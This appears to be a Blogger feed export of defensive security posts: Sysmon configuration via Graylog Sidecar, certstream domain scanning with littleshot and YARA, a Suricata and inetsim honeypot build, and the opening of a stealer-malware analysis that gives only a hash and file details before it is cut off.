href="https://blogger.googleusercontent.com/img/a/AVvXsEgPi9m67elykNdt5J4V1VHLdXlK4IIxq_fLw3fjL-9gfR9pZ6jmaQgpdm8A9081Ro1Qmdamag3BOexdVuyMqqtTBSJNgQVGDxXwlUUlJUMa2lSSk92pTfWxKaCJF7Djk9INRMN_IQPlFIv-NLO1UjFrVxwD77YZRFtrImgY0v9zaxKiDcssgFWiTfW4" style="margin-left: 1em; margin-right: 1em;"><img alt="" data-original-height="932" data-original-width="729" height="523" src="https://blogger.googleusercontent.com/img/a/AVvXsEgPi9m67elykNdt5J4V1VHLdXlK4IIxq_fLw3fjL-9gfR9pZ6jmaQgpdm8A9081Ro1Qmdamag3BOexdVuyMqqtTBSJNgQVGDxXwlUUlJUMa2lSSk92pTfWxKaCJF7Djk9INRMN_IQPlFIv-NLO1UjFrVxwD77YZRFtrImgY0v9zaxKiDcssgFWiTfW4=w411-h523" width="411" /></a></div><br />We're using foreground execution since we just need to execute the command to update sysmon config and exit.<p></p><p>The update command is sysmon -c CONFIG_FILENAME so we're using -c "%s", %s is the filepath of our config, when it's written to the disk.</p><p>Default template can be used to use a default config but I'm leaving it empty here.</p><p>Next on Collection configuration page, click Create Configuration</p><p></p><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/a/AVvXsEhjHoI7nBUSwNBOOCk4_QfswTKOClbbAdZqDnMqA9PyJ3LTEZbhtI6VDfGQRg33smrZ0KSylNhOQVIX09KXE-25ziQKPUZuJDnoUO4FzAjbVnf0yfhlBDicq4lQB0eT0vge7mfgT8wOl_AOxgOYMupUyLhiUd-IurKAOlTlEZeO1XosaOEAR94-o7EU" style="margin-left: 1em; margin-right: 1em;"><img alt="" data-original-height="934" data-original-width="1275" height="422" src="https://blogger.googleusercontent.com/img/a/AVvXsEhjHoI7nBUSwNBOOCk4_QfswTKOClbbAdZqDnMqA9PyJ3LTEZbhtI6VDfGQRg33smrZ0KSylNhOQVIX09KXE-25ziQKPUZuJDnoUO4FzAjbVnf0yfhlBDicq4lQB0eT0vge7mfgT8wOl_AOxgOYMupUyLhiUd-IurKAOlTlEZeO1XosaOEAR94-o7EU=w576-h422" width="576" /></a></div><br />Name your configuration and add the xml config content.<p></p><p>You can create and add more configurations for different systems you may have.</p><h2 style="text-align: left;">Pushing configuration to a host:</h2><p>Go to the sidecar Administration page</p><p></p><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/a/AVvXsEg1udc_OSEWuAohjONARGALw5ZC6K6A1xy-v-p5gEZXQmP_3aa077kNGeUqyRp7h7aFdErxYJQ0FGXoPakF69oETnwtNsYZnxyez7HPSaMKVeaAOAHV68I6RffheaSwtRvc1aPVo7-_i9kiuqqC5UsbnS1_ZWhMUQGBhlJXcIDUWB721QbjZlDnrdX6" style="margin-left: 1em; margin-right: 1em;"><img alt="" data-original-height="555" data-original-width="922" height="222" src="https://blogger.googleusercontent.com/img/a/AVvXsEg1udc_OSEWuAohjONARGALw5ZC6K6A1xy-v-p5gEZXQmP_3aa077kNGeUqyRp7h7aFdErxYJQ0FGXoPakF69oETnwtNsYZnxyez7HPSaMKVeaAOAHV68I6RffheaSwtRvc1aPVo7-_i9kiuqqC5UsbnS1_ZWhMUQGBhlJXcIDUWB721QbjZlDnrdX6=w369-h222" width="369" /></a></div><br />Check Sysmon and select the right sysmon configuration and apply the configuration.<p></p><p></p><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/a/AVvXsEi3G0BH0vAgfJ12Ep7Az1FSmlZk1XNCIxy09tTKOvSl7JSidJq5dz6GXzxrWLZEVg8Bdqp-3UNRW30kV77UuPwGY4Iui9PRYUxZO1ceshbPlC8j1gZ7YulbEAYwmxTL4-_hCxprOTo7bRVVkHpdHcE_pXrQAfpnLD9zJMut7Cg-kGPmXrcJCgE6u9cD" style="margin-left: 1em; margin-right: 1em;"><img alt="" data-original-height="257" data-original-width="591" height="171" src="https://blogger.googleusercontent.com/img/a/AVvXsEi3G0BH0vAgfJ12Ep7Az1FSmlZk1XNCIxy09tTKOvSl7JSidJq5dz6GXzxrWLZEVg8Bdqp-3UNRW30kV77UuPwGY4Iui9PRYUxZO1ceshbPlC8j1gZ7YulbEAYwmxTL4-_hCxprOTo7bRVVkHpdHcE_pXrQAfpnLD9zJMut7Cg-kGPmXrcJCgE6u9cD=w394-h171" width="394" /></a></div><br />Graylog webui may say the update failed but you can click the host you updated and click Show details to see more:<p></p><p></p><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/a/AVvXsEhf9ei0_kD0NdA26rgqGJwc0XJW1mWEubPJtwS6bMu0qsPRXJNlDtVLekFULvv-OM6Z6OXJ7mTw3SxKLrkoaj6zFoYAWX3t7dfPn5yIn2ZeJqe01tuKjqclGHTvwyy3UDGZPW2StCQ9WShZH51Ncv3RfkdnuZ0liG_nls_ZKHTYDkCybEa_I_T27mAn" style="margin-left: 1em; margin-right: 1em;"><img alt="" data-original-height="515" data-original-width="1707" height="198" src="https://blogger.googleusercontent.com/img/a/AVvXsEhf9ei0_kD0NdA26rgqGJwc0XJW1mWEubPJtwS6bMu0qsPRXJNlDtVLekFULvv-OM6Z6OXJ7mTw3SxKLrkoaj6zFoYAWX3t7dfPn5yIn2ZeJqe01tuKjqclGHTvwyy3UDGZPW2StCQ9WShZH51Ncv3RfkdnuZ0liG_nls_ZKHTYDkCybEa_I_T27mAn=w654-h198" width="654" /></a></div><br />Above you can see that the configuration updated without an issue. <p></p><p>You can also confirm the update by looking at event id 16 from sysmon in your SIEM or Event Viewer like below</p><p></p><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/a/AVvXsEidxAmByWLQ6Qf5i5Q6-QqEj0gzpekdo6IEAcqA4yQALFvqoMJU1NAP4GPp1q0XI20cTSj28DU0czKEccR7FMK-uFqKpiyjaUXfIniuzvYwaidU1G6vd8Qs7Caf8CRusNgjfuACW69eAEcayzrnW8NZnrNOLFS36lj8olvWlunVvcThq97I6SKKPUd9" style="margin-left: 1em; margin-right: 1em;"><img alt="" data-original-height="372" data-original-width="588" height="285" src="https://blogger.googleusercontent.com/img/a/AVvXsEidxAmByWLQ6Qf5i5Q6-QqEj0gzpekdo6IEAcqA4yQALFvqoMJU1NAP4GPp1q0XI20cTSj28DU0czKEccR7FMK-uFqKpiyjaUXfIniuzvYwaidU1G6vd8Qs7Caf8CRusNgjfuACW69eAEcayzrnW8NZnrNOLFS36lj8olvWlunVvcThq97I6SKKPUd9=w452-h285" width="452" /></a></div><br /><br /><p></p><h3 style="text-align: left;">Building initial installation package recommendations:</h3><p>Your initial sidecar agent package should do the following:</p><p></p><ul style="text-align: left;"><li>Drop sysmon executable in the sidecar folder</li><li>Sidecar.yml file needs to contain path for sysmon executable in the allowed files</li><li>Install sysmon with whatever initial configuration you'd like to use</li></ul><div>If you build an installation package yourself, you don't have to do all the stuff manually above...</div><p></p><p>Once you deploy sidecar agent + sysmon initially, you can remotely manage the sysmon configuration through Graylog sidecar UI.</p><h2 style="text-align: left;">Links/Resources:</h2><p><a href="https://docs.microsoft.com/en-us/sysinternals/downloads/sysmon">https://docs.microsoft.com/en-us/sysinternals/downloads/sysmon</a></p><p><a href="https://www.graylog.org/">https://www.graylog.org/</a></p><p><a href="https://www.graylog.org/features/sidecar">https://www.graylog.org/features/sidecar</a></p><p><a href="https://github.com/Graylog2/collector-sidecar/releases">https://github.com/Graylog2/collector-sidecar/releases</a></p><p><a href="https://docs.graylog.org/docs/sidecar">https://docs.graylog.org/docs/sidecar</a></p><p><a href="https://github.com/olafhartong/sysmon-modular">https://github.com/olafhartong/sysmon-modular</a></p><p><a href="https://github.com/SwiftOnSecurity/sysmon-config">https://github.com/SwiftOnSecurity/sysmon-config</a></p><p><a href="https://github.com/LaresLLC/SysmonConfigPusher">https://github.com/LaresLLC/SysmonConfigPusher</a> - I came across this after finishing this write up...</p>Unknownnoreply@blogger.comtag:blogger.com,1999:blog-8341113811870246566.post-54924618272782685272022-07-20T12:43:00.000-07:002022-07-20T12:43:35.777-07:00Screenshotting/scanning domains from certstream with littleshot to find interesting content<h3 style="text-align: left;"><b>Introduction:</b></h3><p>Certstream is a great service which provides updates from Certificate Transparency Log, which has info regarding certs being issued from several providers.</p><p>Certstream data has been used in the past for detection of malicious sites or phishing sites. There are several links in the resources section about certstream usage.</p><p>Littleshot is a tool similar to urlscan and urlquery(RIP) which I wrote a while ago because I wanted to be able to screenshot a ton of sites and collect metadata regarding them. (It's here: <a href="https://github.com/BoredHackerBlog/littleshot">https://github.com/BoredHackerBlog/littleshot</a>) I realized having yara scan html body would be cool so I added that feature as well later on. There is also a branch that uses tor for connections. It's not the most optimized project and error handling isn't the best but it's good enough for my purposes.</p><p>You can also put newly registered domains through littleshot as well but I've decided not to do that for now.</p><h3 style="text-align: left;"><b>Goals:</b></h3><p>- Take certstream domains and scan them with littleshot</p><p>- Utilize yara rules to look for interesting pages</p><p>- Send some metadata to Humio (littleshot by default doesn't do this) for either alerting, dashboarding, or just searching.</p><p>- Ensure that there is caching of domains from certstream to avoid rescanning domains</p><h3 style="text-align: left;"><b>Tech stack:</b></h3><p>I'm hosting everything on vultr. (Here's a ref link if you'd like to try vultr for your projects: https://www.vultr.com/?ref=8969054-8H)</p><p>- Littleshot</p><p>-- caddy - reverse proxy</p><p>-- flask - webapp</p><p>-- redis - job queue</p><p>-- python-rq - job distribution/workers</p><p>-- mongodb - store json documents/metadata</p><p>-- minio - store screenshots</p><p>- Certstream + python - Im getting certstream domains and doing filtering and cache lookup with python</p><p>- Memcached - Caching. I wanna avoid scanning the same domain twice for a while so i'm using memcached</p><h3 style="text-align: left;">Setup:</h3><p>The diagram below shows the setup I have going.</p><p></p><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/a/AVvXsEj4c0RKa-_GBywKVUh2Mo2fA4bUjhhDztYJxOro3K6dWqor-VVwPmaAnsye5uRXADkYm8cRF7fM7_mZcJBKx0FWQhO-BZ-WGtF7ehG1fNChCgdlDmbSvYhDjW6cl86JCRn80EPrDg0-9Mrwtxlhh4kvqtymhaQcbYd1ajDqWbJjjO3LmwsC12lgdRL1" style="margin-left: 1em; margin-right: 1em;"><img data-original-height="520" data-original-width="816" height="408" src="https://blogger.googleusercontent.com/img/a/AVvXsEj4c0RKa-_GBywKVUh2Mo2fA4bUjhhDztYJxOro3K6dWqor-VVwPmaAnsye5uRXADkYm8cRF7fM7_mZcJBKx0FWQhO-BZ-WGtF7ehG1fNChCgdlDmbSvYhDjW6cl86JCRn80EPrDg0-9Mrwtxlhh4kvqtymhaQcbYd1ajDqWbJjjO3LmwsC12lgdRL1=w640-h408" width="640" /></a></div><br /><p></p><p>I get data from certstream and I'm using some filtering to ensure that I don't scan certain domains.</p><p>Once the keyword based filtering is done, I check the domain against memcached to ensure that it hasn't been scanned before in the past 48 hours.</p><p>If the domain wasnt scanned in the past 48 hours, I queue to be scanned with littleshot.</p><p>When littleshot worker does the scan, it sends taskid, domain, title, and yara matches to Humio (besides just doing normal littleshot things).</p><p>Certstream_to_littleshot script - <a href="https://github.com/BoredHackerBlog/certstream_to_littleshot/blob/main/certstream_to_littleshot.py">https://github.com/BoredHackerBlog/certstream_to_littleshot/blob/main/certstream_to_littleshot.py</a></p><p>Yara rules (these aren't the best. you should probably write your own based on your needs) - <a href="https://github.com/BoredHackerBlog/certstream_to_littleshot/blob/main/rules.yar">https://github.com/BoredHackerBlog/certstream_to_littleshot/blob/main/rules.yar</a></p><p>Worker code to support sending data to Humio - <a href="https://github.com/BoredHackerBlog/certstream_to_littleshot/blob/main/worker.py">https://github.com/BoredHackerBlog/certstream_to_littleshot/blob/main/worker.py</a></p><p><br /></p><h3 style="text-align: left;">Interesting stuff I came across:</h3><div>- Lots of wordpress and nextcloud/owncloud sites and general stuff people self-host</div><div>- Carding forum?</div><div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/a/AVvXsEgh3hoVia4aLr2VCMiKfi1TrDdpGQSguuBM142GZyACNNM9GDdhf7ZkFBqO882j88rFiZ1EOLQs3T0JG7K_dL2YJVN-ARW75CG8VHo_4cIv2M-RHyhbSv_NRTQLnaD2knuyjD4e3lo4q0JjhKa5375Ta-MOCWTWhLirRmfxuzK7llZgEVQ_LcW9nskn" style="margin-left: 1em; margin-right: 1em;"><img alt="" data-original-height="471" data-original-width="1149" height="131" src="https://blogger.googleusercontent.com/img/a/AVvXsEgh3hoVia4aLr2VCMiKfi1TrDdpGQSguuBM142GZyACNNM9GDdhf7ZkFBqO882j88rFiZ1EOLQs3T0JG7K_dL2YJVN-ARW75CG8VHo_4cIv2M-RHyhbSv_NRTQLnaD2knuyjD4e3lo4q0JjhKa5375Ta-MOCWTWhLirRmfxuzK7llZgEVQ_LcW9nskn" width="320" /></a></div><br />- Argo CI/CD without auth?</div><div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/a/AVvXsEj3QHYpF1RA_zorInpUw4YJizxIdVp4rZWqpUVsroHCEL0AmdbxLvG9wlWa-9Mn1Qm3_Gt0Q_MvlBpmp7y3s_DE4baZqkn1MckrdSEemiXmbvQbL-z36ndoXe79xzh481Z2ligZduvhy-qGGGQmZ1v-Ss3sSrvhuYpyiKMbrvfl8c7GrY0TJsEOiEzk" style="margin-left: 1em; margin-right: 1em;"><img alt="" data-original-height="276" data-original-width="394" height="224" src="https://blogger.googleusercontent.com/img/a/AVvXsEj3QHYpF1RA_zorInpUw4YJizxIdVp4rZWqpUVsroHCEL0AmdbxLvG9wlWa-9Mn1Qm3_Gt0Q_MvlBpmp7y3s_DE4baZqkn1MckrdSEemiXmbvQbL-z36ndoXe79xzh481Z2ligZduvhy-qGGGQmZ1v-Ss3sSrvhuYpyiKMbrvfl8c7GrY0TJsEOiEzk" width="320" /></a></div>- Piracy site</div><div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/a/AVvXsEinxRtzMKJgRPFm8-xRW9n-i2StQvYYEKKZ-3GCJKgPvoHAw97qY6_AZb8Z7kZVejO3ZwRCFfD2yeC1w6UmeSCHxFgWJfGhH2NWYAd-D2ePPy4iLpAO9vrEPdb8h2M9u6kurSMccVb3A3we89P5JxS6JvbFSlok_EDyqcRPcKGnWu17kDTEviHPWXrH" style="margin-left: 1em; margin-right: 1em;"><img alt="" data-original-height="592" data-original-width="694" height="240" src="https://blogger.googleusercontent.com/img/a/AVvXsEinxRtzMKJgRPFm8-xRW9n-i2StQvYYEKKZ-3GCJKgPvoHAw97qY6_AZb8Z7kZVejO3ZwRCFfD2yeC1w6UmeSCHxFgWJfGhH2NWYAd-D2ePPy4iLpAO9vrEPdb8h2M9u6kurSMccVb3A3we89P5JxS6JvbFSlok_EDyqcRPcKGnWu17kDTEviHPWXrH" width="281" /></a></div><br /><br /></div><div>No phishing sites or C2 with at least my yara rules.<br /><br /></div><div>Here are the yara hits in Humio (ignore abc,xyz, that was me testing Humio API):</div><div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/a/AVvXsEh7t0pwT8ZPzlQJ6cHf7QRHkrvo0APGSfykXCuNCLd6-pmlTvo9U-d6V2ya9IlqDPXwK3ariCbMQBDUdtWm4adxs7Hm-bf0l3WZRnu2G6-eybBEQz5QwSpbvRy_5Y9Y0wESmPwFPkrGIT6NsRS3zOOEhrUObrI1viZofZfrqdJpY75KKmQYopvjXp2V" style="margin-left: 1em; margin-right: 1em;"><img alt="" data-original-height="653" data-original-width="834" height="500" src="https://blogger.googleusercontent.com/img/a/AVvXsEh7t0pwT8ZPzlQJ6cHf7QRHkrvo0APGSfykXCuNCLd6-pmlTvo9U-d6V2ya9IlqDPXwK3ariCbMQBDUdtWm4adxs7Hm-bf0l3WZRnu2G6-eybBEQz5QwSpbvRy_5Y9Y0wESmPwFPkrGIT6NsRS3zOOEhrUObrI1viZofZfrqdJpY75KKmQYopvjXp2V=w640-h500" width="640" /></a></div><br /><br /></div><div><div class="separator" style="clear: both; text-align: center;"><br /></div></div><div><h3 style="text-align: left;">What I would do differently with more time and resources (with this project and with littleshot):</h3><div><div>- Better error handling - Current error handling is meh</div><div>- Get rid of mongodb and replace it with opensearch or graylog maybe? - Opensearch and graylog are great when it comes to searching.</div><div>- Potentially having a indicator list built into littleshot?</div><div>-- Currently tagging is based on yara rules but there are many ways to detect maliciousness, such as hash or URLs.</div><div>- Enrichment of data like urlscan does</div><div>- Better webui - the webui is pretty shit. idk enough html/css/javascript</div><div>- Better logging. There is logging of results but no logging of anything else (queries, crashes, etc...)</div></div><div>- Redirect detection & tagging. Some domains do redirect to legitimate login pages.</div><h3 style="text-align: left;"><br /></h3><h3 style="text-align: left;">Resources & similar projects:</h3><div><a href="https://medium.com/cali-dog-security/introducing-certstream-3fc13bb98067">https://medium.com/cali-dog-security/introducing-certstream-3fc13bb98067</a></div><div><a href="https://certstream.calidog.io/">https://certstream.calidog.io/</a></div><div><a href="https://www.youtube.com/watch?v=s5g7ij5EKoA">https://www.youtube.com/watch?v=s5g7ij5EKoA</a></div><div><a href="https://medium.com/security-analytics/elasticphish-using-certstream-and-the-elastic-stack-for-phishing-intelligence-b03b86ad5cfe">https://medium.com/security-analytics/elasticphish-using-certstream-and-the-elastic-stack-for-phishing-intelligence-b03b86ad5cfe</a></div><div><a href="https://blog.0day.rocks/catching-phishing-using-certstream-97177f0d499a">https://blog.0day.rocks/catching-phishing-using-certstream-97177f0d499a</a></div><div><a href="https://github.com/x0rz/phishing_catcher">https://github.com/x0rz/phishing_catcher</a></div><div><a href="https://github.com/ninoseki/uzen">https://github.com/ninoseki/uzen</a> - ninoseki github has really cool projects. This one is very similar to littleshot actually.</div><div><a href="https://www.boredhackerblog.info/2017/01/python-rq-example.html">https://www.boredhackerblog.info/2017/01/python-rq-example.html</a></div><div><a href="https://github.com/InfosecExtra/StreamshotY">https://github.com/InfosecExtra/StreamshotY</a> - littleshot fork that someone hooked up with certstream. It has a refreshing page of screenshots too like urlscan.</div></div><div><br /></div><div><br /></div><div>(if the blog post formatting looks odd, it's because Blogger editor interface hates me)</div>Unknownnoreply@blogger.comtag:blogger.com,1999:blog-8341113811870246566.post-87926621198908285752022-07-13T16:28:00.004-07:002022-07-13T16:30:32.889-07:00Building a honeypot network with inetsim, suricata, vector.dev, and appsmithI wanted to learn a bit more about data engineering, databases, app building, managing systems, and so on so I decided to work on a small honeypot network as a project. I was partially inspired by Greynoise and AbuseIPDB, I use both of those a lot. I wanted to get this project done in about a week so this is a small project which isn't too scalable. I ended up learning things so it's fine.<div><br /></div><h3 style="text-align: left;"><b>My goals:</b></h3><div>- Use Suricata to see what type of signatures are triggered based on the incoming traffic from the internet</div><div>- Save all the Suricata logs to disk in a central place so I can go back and search all the data or reingest the data.</div><div>- Send logs to Humio for searching, dashboarding, and potentially alerting purposes</div><div>- Have a webapp for searching for an IP</div><div>-- Webapp should show the signatures the IP has triggered, first time the IP was seen, last time the IP was seen, and number of times it was seen triggering signatures.</div><div><br /></div><h3 style="text-align: left;"><b>My tech stack:</b></h3><div>- <b>Sensors & databases</b> are hosted on Vultr w/ Ubuntu</div><div>- Obviously <b>Suricata</b> for detecting attack attempt type</div><div>- <b>Inetsim</b> - this is not the best (i'm letting the attackers know I'm not running any real services, it's just inetsim, assuming attackers manually go look at the scan results) but it'll do for this project</div><div>- <b>Zerotier</b> - all sensors are connected to a zerotier network, it just makes networking, moving data around, and management easier</div><div>- <b>Vector.dev</b> - I'm using vector.dev to move data around</div><div>- <b>Humio</b> - it's for log storage and search, just like ELK or Splunk</div><div>- <b>rinetd</b> - I'm actually not running inetsim on all the sensors, I'm just forwarding all the traffic from sensors to one host running inetsim (it's good enough for this project)</div><div>- <b>Redis</b> - pubsub. I'm putting alerts into redis and letting python grab them and put the data in postgresql</div><div>- <b>Postgresql</b> - to store malicious IP, signature, and timestamp</div><div>- <b>Appsmith</b> - to make webui app (usually i'd use flask...)</div><div><br /></div><h3 style="text-align: left;"><b>Networking:</b></h3><div>Network kinda looks like this w/ Zerotier:</div><div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/a/AVvXsEj_DcMDXZGuLVlN3CWiVKDp6fC-7_f_BcLTy-n2Ezmx5-TRQ7vsqW5LBIRlzYQG5-G2zrb-dAliPsVS92ZLf_5oP_LRsV8QR62L8teBrbTTykvzxB_Hf3kB5E9SkQ0i21bfb9cA9EadmKY82jz0eevaQVtn8kOHduXy3jF_O9R6k3zxSAbNJ0ujPT-_" style="margin-left: 1em; margin-right: 1em;"><img alt="" data-original-height="500" data-original-width="717" height="446" src="https://blogger.googleusercontent.com/img/a/AVvXsEj_DcMDXZGuLVlN3CWiVKDp6fC-7_f_BcLTy-n2Ezmx5-TRQ7vsqW5LBIRlzYQG5-G2zrb-dAliPsVS92ZLf_5oP_LRsV8QR62L8teBrbTTykvzxB_Hf3kB5E9SkQ0i21bfb9cA9EadmKY82jz0eevaQVtn8kOHduXy3jF_O9R6k3zxSAbNJ0ujPT-_=w640-h446" width="640" /></a></div><br />Sensors are exposed to the internet, servers aren't. rinetd takes in sensor traffic from the internet and forwards it to inetsim. inetsim is bound to zerotier IP address.</div><div><br /></div><div>Configuration for rinetd: <a href="https://github.com/BoredHackerBlog/dumbhoneypot/blob/main/rinetd.conf">https://github.com/BoredHackerBlog/dumbhoneypot/blob/main/rinetd.conf</a></div><div><br /></div><h3 style="text-align: left;"><b>Logging:</b></h3><div>The flow for logs kinda looks like this:</div><div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/a/AVvXsEhShPk_F9LlCJL3QY9OaMYCy2uY2L0WFrDTxW-ClKS75tFii0gw7yNw2m6fpvxwF-glrohY_BDHc4vlHvs3ups9NF4xs1OZx6sRT_J5H3wj0bmsMpqNxdfEw1czJwNZvXMHtSQePPMO0PzA0dtAGWD1TDj2kJsyUcOz67d8wqYHDvp2xITErq5zivMv" style="margin-left: 1em; margin-right: 1em;"><img alt="" data-original-height="417" data-original-width="553" height="483" src="https://blogger.googleusercontent.com/img/a/AVvXsEhShPk_F9LlCJL3QY9OaMYCy2uY2L0WFrDTxW-ClKS75tFii0gw7yNw2m6fpvxwF-glrohY_BDHc4vlHvs3ups9NF4xs1OZx6sRT_J5H3wj0bmsMpqNxdfEw1czJwNZvXMHtSQePPMO0PzA0dtAGWD1TDj2kJsyUcOz67d8wqYHDvp2xITErq5zivMv=w640-h483" width="640" /></a></div><br />Vector on all the sensors reads eve.json, sends the data to vector on the ingest server.</div><div>Vector on the ingest server does multiple things. It'll save data to disk, send the data to humio, the alerts will get geoip info added, then it'll go to redis, python will ingest data from redis then put it into postgres.</div><div><br /></div><div>postgres stores malicious IP, suricata signature, and timestamp.</div><div><br /></div><div>Sensor vector config: <a href="https://github.com/BoredHackerBlog/dumbhoneypot/blob/main/sensor_vector.toml">https://github.com/BoredHackerBlog/dumbhoneypot/blob/main/sensor_vector.toml</a></div><div><br /></div><div>Server vector config: <a href="https://github.com/BoredHackerBlog/dumbhoneypot/blob/main/server_vector.toml">https://github.com/BoredHackerBlog/dumbhoneypot/blob/main/server_vector.toml</a></div><div><br /></div><div>Python script being used to process redis data and add data to postgres: <a href="https://github.com/BoredHackerBlog/dumbhoneypot/blob/main/process_redis.py">https://github.com/BoredHackerBlog/dumbhoneypot/blob/main/process_redis.py</a></div><div><br /></div><div><br /></div><h3 style="text-align: left;">Webapp</h3><div>I used AppSmith for the webapp. AppSmith allows you to build a webapp and connect it to integrations it supports with little to no coding. </div><div><br /></div><div>For webapp, I just have an input field and some queries running based on the input. It looks like this:</div><div><br /></div><div><div class="separator" style="clear: both; text-align: center;"><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/a/AVvXsEgc2ZHHpQ3kLerbv_SoTFpEWIymCRFSn7WLg-c59kN5D8JDRdn-lm-Y4vKzHutqIADjpN0Bm4zDzoyfNhkWDmKtJ4izRPsXIDwbnQTCch86AWTBD4Jj2LxHSHrA-GDh0_40i1h3kR_vUyzTYbNX_0pSZE4F8U7oPw8XMnXwpg0U9axfgqRmSnlzo008" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img alt="" data-original-height="578" data-original-width="764" height="485" src="https://blogger.googleusercontent.com/img/a/AVvXsEgc2ZHHpQ3kLerbv_SoTFpEWIymCRFSn7WLg-c59kN5D8JDRdn-lm-Y4vKzHutqIADjpN0Bm4zDzoyfNhkWDmKtJ4izRPsXIDwbnQTCch86AWTBD4Jj2LxHSHrA-GDh0_40i1h3kR_vUyzTYbNX_0pSZE4F8U7oPw8XMnXwpg0U9axfgqRmSnlzo008=w640-h485" width="640" /></a></div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/a/AVvXsEh7OEQFB5lNGwDOEjpnAogSC7rrKc44qvHlp6i_CsW6oNmf9Kc8BhYGd_5rqjIhwGzqEgdZmvBiFu_OjHtwvxWFJzoMjiHEYuaG3naSDKQIFjMdef2pq1d5F6PY6NVrkaiPBC6g9-2vLqCGm2ewUxoaqk5I3EN49Da6p5A0gJHlUd5iyZ17hRc1py8Z" style="margin-left: 1em; margin-right: 1em;"><img alt="" data-original-height="590" data-original-width="733" height="515" src="https://blogger.googleusercontent.com/img/a/AVvXsEh7OEQFB5lNGwDOEjpnAogSC7rrKc44qvHlp6i_CsW6oNmf9Kc8BhYGd_5rqjIhwGzqEgdZmvBiFu_OjHtwvxWFJzoMjiHEYuaG3naSDKQIFjMdef2pq1d5F6PY6NVrkaiPBC6g9-2vLqCGm2ewUxoaqk5I3EN49Da6p5A0gJHlUd5iyZ17hRc1py8Z=w640-h515" width="640" /></a></div><br /><br /></div></div><div><br /></div><div><b>What would I do different if I had more time and resources:</b></div><div>- I'd probably setup a more realistic honeypots or have honeypot profiles</div><div>- Put honeypot software on the sensor itself instead of doing rinetd</div><div>- Ship logs through the internet (not zerotier)</div><div>- Do geoip enrichment on the sensor itself</div><div>- Store alert data in opensearch or some cloud hosted database that I don't have to maintain?</div><div>- Add health monitoring for sensor, pipeline, etc..</div><div>- Better deployment and update (of software and suricata signatures) potentially through ansible?</div><div><br /></div><div>There are probably many other things that can be done differently or more efficiently.</div><div><br /></div><div><b>Code and configs:</b> <a href="https://github.com/BoredHackerBlog/dumbhoneypot">https://github.com/BoredHackerBlog/dumbhoneypot</a></div><div><br /></div><div><b>Resources/links:</b></div><div><a href="https://vector.dev/">https://vector.dev/</a></div><div><a href="https://www.inetsim.org/">https://www.inetsim.org/</a></div><div><a href="https://viz.greynoise.io/">https://viz.greynoise.io/</a></div><div><a href="https://www.abuseipdb.com/">https://www.abuseipdb.com/</a></div><div><a href="https://opensearch.org/">https://opensearch.org/</a></div><div><a href="https://www.appsmith.com/">https://www.appsmith.com/</a></div><div><a href="https://www.humio.com/">https://www.humio.com/</a></div><div><a href="https://www.zerotier.com/">https://www.zerotier.com/</a></div><div><a href="https://suricata.io/">https://suricata.io/</a></div>Unknownnoreply@blogger.comtag:blogger.com,1999:blog-8341113811870246566.post-27417554380770287982022-03-05T12:36:00.001-08:002022-03-05T12:39:15.363-08:00Quick analysis of stealer malware sent via discord<p><b>Introduction:</b></p><p>Just a quick analysis of malware sent via discord...</p><p>I got the malicious file from someone who received the file via Discord from a trusted account (which was compromised...)</p><p><br /></p><p><b>Analysis:</b></p><p>Hash: 4f709e1c6951bbd65d03a9f44961e0ae</p><p>Original filename:Fruit_of_the_ace_v3.11.99.exe</p><p>The file looked like nodejs binary</p><p></p><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/a/AVvXsEghrHFQBKE7dZteO2R9LU9Ss83YOS3HyVKJnvIjgFFP9VMumT_tKImkGhWj6cK-d-7ZBiu8nn7O_tbaeZvPeM_GVJ_NrT39pc9xdeqxg5jHknX0HYKO0JQqU-ebCqBgsBqlSX3b037jJ_j5D0XlQmvshgSJ6elCZRMOOVEbOU3vodtveej5L99uWj_a" style="margin-left: 1em; margin-right: 1em;"><img alt="" data-original-height="200" data-original-width="346" height="185" src="https://blogger.googleusercontent.com/img/a/AVvXsEghrHFQBKE7dZteO2R9LU9Ss83YOS3HyVKJnvIjgFFP9VMumT_tKImkGhWj6cK-d-7ZBiu8nn7O_tbaeZvPeM_GVJ_NrT39pc9xdeqxg5jHknX0HYKO0JQqU-ebCqBgsBqlSX3b037jJ_j5D0XlQmvshgSJ6elCZRMOOVEbOU3vodtveej5L99uWj_a" width="320" /></a></div><p>pdb string: C:\Users\runneradmin\AppData\Local\Temp\pkg.3d5278e5642d39a96bc8ed09\node\out\Release\node.pdb</p><p><br /></p><p>I started by analyzing the file locally but didn't get anywhere quickly so I moved to hatching triage for analysis.</p><p>Results: <a href="https://tria.ge/220220-wnqp3sbeh6">https://tria.ge/220220-wnqp3sbeh6</a></p><p><br /></p><p>Here's the process list:</p><p></p><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/a/AVvXsEjN0JDQvP0e0iCqxmA5ER4wu3CQZC6QQCjoJc5ZRR-cgD_2Fj_gGpo9sAosJVi_WLx53D_dh8OBo2qV5N7B3MfmA3UeLaA8IQ_Kw6RykF0Z4XE1wrzaOiCqOIUU8W_rHrFgj74B0ZxyOc1gCvvtjFP5cCbpcU8yslC74xvUF2kmjh3Qo62Gk5dKXy0z" style="margin-left: 1em; margin-right: 1em;"><img data-original-height="874" data-original-width="710" 